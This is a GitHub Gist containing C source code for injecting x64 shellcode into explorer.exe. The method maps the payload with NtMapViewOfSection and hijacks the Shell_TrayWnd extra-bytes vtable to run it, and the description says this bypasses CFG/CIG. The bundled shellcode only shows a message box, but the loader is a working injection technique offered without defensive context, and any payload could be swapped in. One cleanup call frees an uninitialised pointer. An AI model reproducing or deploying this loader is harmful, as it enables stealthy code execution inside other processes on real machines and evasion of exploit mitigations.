Last active
April 15, 2020 22:49
-
-
Save farzinenddo/31b956a93f4575fffab171679ede8cdc to your computer and use it in GitHub Desktop.
Injecting ShellCode to explorer.exe with ExtraByte and NtMapViewOfSection technique and not affected by CFG/CIG
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdafx.h" | |
#include <Windows.h> | |
// messagebox(x64) shellcode | |
unsigned char shellcode[] = | |
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" | |
"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" | |
"\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" | |
"\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" | |
"\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" | |
"\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88" | |
"\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48" | |
"\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e" | |
"\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41" | |
"\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24" | |
"\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0" | |
"\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e" | |
"\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" | |
"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" | |
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1" | |
"\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d" | |
"\x85\x2d\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff" | |
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48" | |
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13" | |
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x4d\x61\x70\x70\x69" | |
"\x6e\x67\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x21\x00\x4d" | |
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"; | |
typedef enum _SECTION_INHERIT { | |
ViewShare = 1, | |
ViewUnmap = 2 | |
} SECTION_INHERIT; | |
typedef NTSTATUS(WINAPI *TypeNtMapViewOfSection)( | |
HANDLE SectionHandle, | |
HANDLE ProcessHandle, | |
PVOID *BaseAddress, | |
ULONG_PTR ZeroBits, | |
SIZE_T CommitSize, | |
PLARGE_INTEGER SectionOffset, | |
PSIZE_T ViewSize, | |
DWORD InheritDisposition, | |
ULONG AllocationType, | |
ULONG Win32Protect); | |
typedef struct _ctray_vtable { | |
ULONG_PTR vTable; | |
ULONG_PTR AddRef; | |
ULONG_PTR Release; | |
ULONG_PTR WndProc; | |
} CTray; | |
VOID extraBytes() { | |
LPVOID cs, ds; | |
CTray ct; | |
ULONG_PTR ctp; | |
HWND hw; | |
HANDLE hp; | |
DWORD pid; | |
SIZE_T wr; | |
HMODULE ntdll = GetModuleHandleA("ntdll.dll"); | |
TypeNtMapViewOfSection pNtMapViewOfSection = (TypeNtMapViewOfSection)GetProcAddress(ntdll, "NtMapViewOfSection"); | |
hw = FindWindow(L"Shell_TrayWnd", NULL); | |
GetWindowThreadProcessId(hw, &pid); | |
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); | |
ctp = GetWindowLongPtr(hw, 0); | |
ReadProcessMemory(hp, (LPVOID)ctp,(LPVOID)&ct.vTable, sizeof(ULONG_PTR), &wr); | |
ReadProcessMemory(hp, (LPVOID)ct.vTable,(LPVOID)&ct.AddRef, sizeof(ULONG_PTR) * 3, &wr); | |
HANDLE hFileMap = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL); | |
LPVOID lpMapAddress = MapViewOfFile(hFileMap, FILE_MAP_WRITE, 0, 0, sizeof(shellcode)); | |
memcpy((PVOID)lpMapAddress, shellcode, sizeof(shellcode)); | |
LPVOID requested_target_payload = 0; | |
SIZE_T view_size = 0; | |
pNtMapViewOfSection(hFileMap, hp, &requested_target_payload, 0, sizeof(shellcode), NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE); | |
ds = VirtualAllocEx(hp, NULL, sizeof(ct),MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
ct.vTable = (ULONG_PTR)ds + sizeof(ULONG_PTR); | |
ct.WndProc = (ULONG_PTR)requested_target_payload; | |
WriteProcessMemory(hp, ds, &ct, sizeof(ct), &wr); | |
SetWindowLongPtr(hw, 0, (ULONG_PTR)ds); | |
PostMessage(hw, WM_CLOSE, 0, 0); | |
SetWindowLongPtr(hw, 0, ctp); | |
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE); | |
VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE); | |
CloseHandle(hp); | |
} | |
int main() | |
{ | |
extraBytes(); | |
return 0; | |
} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment